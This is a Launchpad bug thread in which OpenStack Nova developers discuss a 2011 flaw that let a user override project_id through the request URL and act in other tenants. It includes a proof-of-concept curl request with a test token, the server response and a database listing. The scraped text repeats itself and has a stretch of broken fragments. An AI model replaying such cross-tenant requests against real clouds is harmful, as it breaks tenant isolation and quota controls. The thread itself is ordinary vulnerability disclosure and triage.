>ttx
I'm ok to not disclosing this in the next two
weeks. Me, Rohit and Ravi found this bug.
>Vish
Thank you for your patch.
I have one question. Why we still set project_id from URL?
Cheers
Nati
2011/12/16 Vish Ishaya <email address hidden>:
> Comments below
>
> On Dec 16, 2011, at 1:30 PM, anotherjesse wrote:
>
>> ttx
>>
>> 1) you still need to be authenticated. The keystone middleware doesn't
>> let the request hit the router if you fail to auth.
>>
>> 2) you can issue any openstack api request against any tenant.
>>
>> Because most logic in the API uses the context (not the URL) to specify
>> the resources you are interacting with (for example list servers uses
>> the tenant from the context)
>>
>> instance_list = self.compute_api.get_all(context,
>> search_opts=search_opts)
>>
>> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/servers.py#L145
>>
>> So you can create a server in another project but delete, list, show
>> (and most other api calls) will not be able to modify it by via the api.
>> This is because the way that the database layer is written is defensive
>> - it only lets you access data that your context says you have access
>> to.
>>
>> This is still bad in that it allows creation of resources outside of
>> your project (for quota/billing avoidance) and there could be more
>> tunnels.
>
> I believe this is incorrect. The broken code actually sets context.project_id = to whatever was in the url, so I think you can list and terminate instances in other projects as well.
>>
>> 3) only affects if you are the openstack api using keystone (not
>> deprecated auth)
>>
>> It shouldn't affect people who use the default (which is nova's internal
>> legacy auth) or who use the ec2 api
>
> legacy auth is also broken afaik, because it will successfully authenticate and then the authentication will be overwritten by the url. EC2 auth shouldn't be affected.
>>
>> --
>> You received this bug notification because you are a member of Nova
>> Core, which is subscribed to the bug report.
>> https://bugs.launchpad.net/bugs/904072
>>
>> Title:
>> project_id could be overwritten to any value by URI value
>>
>> Status in OpenStack Compute (Nova):
>> Confirmed
>>
>> Bug description:
>> project_id could be overwritten to any value by URI value.
>> User can create server on any project (even if it is not exist)
>> Quota function will not be working because of this bug. (So This bug is a security vulnerability)
>>
>> --Test condition
>> user : demo (not admin)
>> project_id: 2
>>
>> -- Requeest
>> stack@freecloud116:~/devstack$ curl -H "Content-type: application/json" -H "x-auth-token: 8bbdb554-a671-446e-a6c2-07326eeb9ad5" -d '{"server": {"min_count": 1, "flavorRef": "1", "name": "test5", "imageRef": "2", "max_count": 1}}' http://localhost:8774/v1.1/tushar2/servers <-- invalid tenant_id
>>
>> -- Response
>> {"server": {"status": "BUILD", "updated": "2011-12-14T03:06:04Z", "hostId": "", "user_id": "demo", "name": "test5", "links": [{"href": "http://localhost:8774/v1.1/tushar2/servers/7", "rel": "self"}, {"href": "http://localhost:8774/tushar2/servers/7", "rel": "bookmark"}], "addresses": {}, "tenant_id": "tushar2", "image": {"id": "2", "links": [{"href": "http://localhost:8774/tushar2/images/2", "rel": "bookmark"}]}, "created": "2011-12-14T03:06:04Z", "uuid": "5b63c965-8966-4ebc-ae1b-1c1c551a044c", "accessIPv4": "", "accessIPv6": "", "key_name": null, "adminPass": "id8SngCb7xeRq67K", "progress": 0, "flavor": {"id": "1", "links": [{"href": "http://localhost:8774/tushar2/flavors/1", "rel": "bookmark"}]}, "config_drive": "", "id": 7, "metadata": {}}}stack@freecloud116:~/devstack$
>>
>> -- DB result
>> instance with project_id "tushar2" is created
>>
>> mysql> select id,project_id from instances;
>> +----+------------+
>> | id | project_id |
>> +----+------------+
>> | 1 | demo5 |
>> | 2 | demo5 |
>> | 3 | tushar |
>> | 4 | tushar1 |
>> | 5 | tushar2 |
>> | 6 | tushar2 |
>> | 7 | tushar2 |
>> +----+------------+
>> 7 rows in set (0.00 sec)
>>
>> --Cause of this bug
>> This code set project_id to request object from uri
>> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/__init__.py#L78
>>
>> Then this code set the project_id to context object
>> https://github.com/openstack/nova/blob/master/nova/api/openstack/wsgi.py#L554
>>
>> To manage notifications about this bug go to:
>> https://bugs.launchpad.net/nova/+bug/904072/+subscriptions
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/904072
>
> Title:
> project_id could be overwritten to any value by URI value
>
> Status in OpenStack Compute (Nova):
> Confirmed
>
> Bug description:
> project_id could be overwritten to any value by URI value.
> User can create server on any project (even if it is not exist)
> Quota function will not be working because of this bug. (So This bug is a security vulnerability)
>
> --Test condition
> user : demo (not admin)
> project_id: 2
>
> -- Requeest
> stack@freecloud116:~/devstack$ curl -H "Content-type: application/json" -H "x-auth-token: 8bbdb554-a671-446e-a6c2-07326eeb9ad5" -d '{"server": {"min_count": 1, "flavorRef": "1", "name": "test5", "imageRef": "2", "max_count": 1}}' http://localhost:8774/v1.1/tushar2/servers <-- invalid tenant_id
>
> -- Response
> {"server": {"status": "BUILD", "updated": "2011-12-14T03:06:04Z", "hostId": "", "user_id": "demo", "name": "test5", "links": [{"href": "http://localhost:8774/v1.1/tushar2/servers/7", "rel": "self"}, {"href": "http://localhost:8774/tushar2/servers/7", "rel": "bookmark"}], "addresses": {}, "tenant_id": "tushar2", "image": {"id": "2", "links": [{"href": "http://localhost:8774/tushar2/images/2", "rel": "bookmark"}]}, "created": "2011-12-14T03:06:04Z", "uuid": "5b63c965-8966-4ebc-ae1b-1c1c551a044c", "accessIPv4": "", "accessIPv6": "", "key_name": null, "adminPass": "id8SngCb7xeRq67K", "progress": 0, "flavor": {"id": "1", "links": [{"href": "http://localhost:8774/tushar2/flavors/1", "rel": "bookmark"}]}, "config_drive": "", "id": 7, "metadata": {}}}stack@freecloud116:~/devstack$
>
> -- DB result
> instance with project_id "tushar2" is created
>
> mysql> select id,project_id from instances;
> +----+------------+
> | id | project_id |
> +----+------------+
> | 1 | demo5 |
> | 2 | demo5 |
> | 3 | tushar |
> | 4 | tushar1 |
> | 5 | tushar2 |
> | 6 | tushar2 |
> | 7 | tushar2 |
> +----+------------+
> 7 rows in set (0.00 sec)
>
> --Cause of this bug
> This code set project_id to request object from uri
> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/__init__.py#L78
>
> Then this code set the project_id to context object
> https://github.com/openstack/nova/blob/master/nova/api/openstack/wsgi.py#L554
>
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/nova/+bug/904072/+subscriptions
Hi All
>ttx
I'm ok to not disclosing this in the next two
weeks. Me, Rohit and Ravi found this bug.
>Vish
Thank you for your patch.
I have one question. Why we still set project_id from URL?
Cheers
Nati
2011/12/16 Vish Ishaya <email address hidden>: api.get_ all(context, opts=search_ opts) /github. com/openstack/ nova/blob/ master/ nova/api/ openstack/ v2/servers. py#L145 /bugs.launchpad .net/bugs/ 904072 116:~/devstack$ curl -H "Content-type: application/json" -H "x-auth-token: 8bbdb554- a671-446e- a6c2-07326eeb9a d5" -d '{"server": {"min_count": 1, "flavorRef": "1", "name": "test5", "imageRef": "2", "max_count": 1}}' http:// localhost: 8774/v1. 1/tushar2/ servers <-- invalid tenant_id 14T03:06: 04Z", "hostId": "", "user_id": "demo", "name": "test5", "links": [{"href": "http:// localhost: 8774/v1. 1/tushar2/ servers/ 7", "rel": "self"}, {"href": "http:// localhost: 8774/tushar2/ servers/ 7", "rel": "bookmark"}], "addresses": {}, "tenant_id": "tushar2", "image": {"id": "2", "links": [{"href": "http:// localhost: 8774/tushar2/ images/ 2", "rel": "bookmark"}]}, "created": "2011-12- 14T03:06: 04Z", "uuid": "5b63c965- 8966-4ebc- ae1b-1c1c551a04 4c", "accessIPv4": "", "accessIPv6": "", "key_name": null, "adminPass": "id8SngCb7xeRq67K", "progress": 0, "flavor": {"id": "1", "links": [{"href": "http:// localhost: 8774/tushar2/ flavors/ 1", "rel": "bookmark"}]}, "config_drive": "", "id": 7, "metadata": {}}}stack@ freecloud116: ~/devstack$ /github. com/openstack/ nova/blob/ master/ nova/api/ openstack/ v2/__init_ _.py#L78 /github. com/openstack/ nova/blob/ master/ nova/api/ openstack/ wsgi.py# L554 /bugs.launchpad .net/nova/ +bug/904072/ +subscriptions /bugs.launchpad .net/bugs/ 904072 116:~/devstack$ curl -H "Content-type: application/json" -H "x-auth-token: 8bbdb554- a671-446e- a6c2-07326eeb9a d5" -d '{"server": {"min_count": 1, "flavorRef": "1", "name": "test5", "imageRef": "2", "max_count": 1}}' http:// localhost: 8774/v1. 1/tushar2/ servers <-- invalid tenant_id 14T03:06: 04Z", "hostId": "", "user_id": "demo", "name": "test5", "links": [{"href": "http:// localhost: 8774/v1. 1/tushar2/ servers/ 7", "rel": "self"}, {"href": "http:// localhost: 8774/tushar2/ servers/ 7", "rel": "bookmark"}], "addresses": {}, "tenant_id": "tushar2", "image": {"id": "2", "links": [{"href": "http:// localhost: 8774/tushar2/ images/ 2", "rel": "bookmark"}]}, "created": "2011-12- 14T03:06: 04Z", "uuid": "5b63c965- 8966-4ebc- ae1b-1c1c551a04 4c", "accessIPv4": "", "accessIPv6": "", "key_name": null, "adminPass": "id8SngCb7xeRq67K", "progress": 0, "flavor": {"id": "1", "links": [{"href": "http:// localhost: 8774/tushar2/ flavors/ 1", "rel": "bookmark"}]}, "config_drive": "", "id": 7, "metadata": {}}}stack@ freecloud116: ~/devstack$ /github. com/openstack/ nova/blob/ master/ nova/api/ openstack/ v2/__init_ _.py#L78 /github. com/openstack/ nova/blob/ master/ nova/api/ openstack/ wsgi.py# L554 /bugs.launchpad .net/nova/ +bug/904072/ +subscriptions
> Comments below
>
> On Dec 16, 2011, at 1:30 PM, anotherjesse wrote:
>
>> ttx
>>
>> 1) you still need to be authenticated. The keystone middleware doesn't
>> let the request hit the router if you fail to auth.
>>
>> 2) you can issue any openstack api request against any tenant.
>>
>> Because most logic in the API uses the context (not the URL) to specify
>> the resources you are interacting with (for example list servers uses
>> the tenant from the context)
>>
>> instance_list = self.compute_
>> search_
>>
>> https:/
>>
>> So you can create a server in another project but delete, list, show
>> (and most other api calls) will not be able to modify it by via the api.
>> This is because the way that the database layer is written is defensive
>> - it only lets you access data that your context says you have access
>> to.
>>
>> This is still bad in that it allows creation of resources outside of
>> your project (for quota/billing avoidance) and there could be more
>> tunnels.
>
> I believe this is incorrect. The broken code actually sets context.project_id = to whatever was in the url, so I think you can list and terminate instances in other projects as well.
>>
>> 3) only affects if you are the openstack api using keystone (not
>> deprecated auth)
>>
>> It shouldn't affect people who use the default (which is nova's internal
>> legacy auth) or who use the ec2 api
>
> legacy auth is also broken afaik, because it will successfully authenticate and then the authentication will be overwritten by the url. EC2 auth shouldn't be affected.
>>
>> --
>> You received this bug notification because you are a member of Nova
>> Core, which is subscribed to the bug report.
>> https:/
>>
>> Title:
>> project_id could be overwritten to any value by URI value
>>
>> Status in OpenStack Compute (Nova):
>> Confirmed
>>
>> Bug description:
>> project_id could be overwritten to any value by URI value.
>> User can create server on any project (even if it is not exist)
>> Quota function will not be working because of this bug. (So This bug is a security vulnerability)
>>
>> --Test condition
>> user : demo (not admin)
>> project_id: 2
>>
>> -- Requeest
>> stack@freecloud
>>
>> -- Response
>> {"server": {"status": "BUILD", "updated": "2011-12-
>>
>> -- DB result
>> instance with project_id "tushar2" is created
>>
>> mysql> select id,project_id from instances;
>> +----+------------+
>> | id | project_id |
>> +----+------------+
>> | 1 | demo5 |
>> | 2 | demo5 |
>> | 3 | tushar |
>> | 4 | tushar1 |
>> | 5 | tushar2 |
>> | 6 | tushar2 |
>> | 7 | tushar2 |
>> +----+------------+
>> 7 rows in set (0.00 sec)
>>
>> --Cause of this bug
>> This code set project_id to request object from uri
>> https:/
>>
>> Then this code set the project_id to context object
>> https:/
>>
>> To manage notifications about this bug go to:
>> https:/
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https:/
>
> Title:
> project_id could be overwritten to any value by URI value
>
> Status in OpenStack Compute (Nova):
> Confirmed
>
> Bug description:
> project_id could be overwritten to any value by URI value.
> User can create server on any project (even if it is not exist)
> Quota function will not be working because of this bug. (So This bug is a security vulnerability)
>
> --Test condition
> user : demo (not admin)
> project_id: 2
>
> -- Requeest
> stack@freecloud
>
> -- Response
> {"server": {"status": "BUILD", "updated": "2011-12-
>
> -- DB result
> instance with project_id "tushar2" is created
>
> mysql> select id,project_id from instances;
> +----+------------+
> | id | project_id |
> +----+------------+
> | 1 | demo5 |
> | 2 | demo5 |
> | 3 | tushar |
> | 4 | tushar1 |
> | 5 | tushar2 |
> | 6 | tushar2 |
> | 7 | tushar2 |
> +----+------------+
> 7 rows in set (0.00 sec)
>
> --Cause of this bug
> This code set project_id to request object from uri
> https:/
>
> Then this code set the project_id to context object
> https:/
>
> To manage notifications about this bug go to:
> https:/